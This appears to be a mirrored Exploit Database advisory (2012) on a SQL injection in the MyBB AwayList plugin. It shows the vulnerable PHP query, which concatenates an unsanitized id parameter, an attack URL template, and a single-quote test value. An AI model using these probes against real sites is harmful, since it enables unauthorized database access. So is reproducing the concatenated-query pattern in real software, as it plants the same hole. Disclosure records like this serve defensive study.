MyBB AwayList Plugin – ‘index.php?id’ SQL Injection

• Exploit Database
• 16 阅读

• 作者： Red_Hat
  日期： 2012-12-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/23625/

• # Exploit Title: AwayList MyBB plugin SQLi 0day
  # Exploit Author: Red_Hat [Team Vect0r]
  # Software Link: http://mods.mybb.com/view/awaylist
  # Tested on: Windows & Linux.
  
  
  Vulnerable code :
  
  <?php
  $query = $db->simple_select( // 245
  "awaylist", '*', "id = '" . $mybb->input['id'] . "'" // 246
  ); // 247
  $item = $db->fetch_array($query); // 248
  ?>
  
  The variable '$mybb->input['id']' remains unsanitized.
  
  Usage : http://server/index.php?action=editAwlItem&id=[SQLi]
  
  Exploit-DB Not:
  This is what worked for us: awaylist.php?action=editAwlItem&id=1'
  
  Shoutout to Zixem <3 & Team Vect0r :3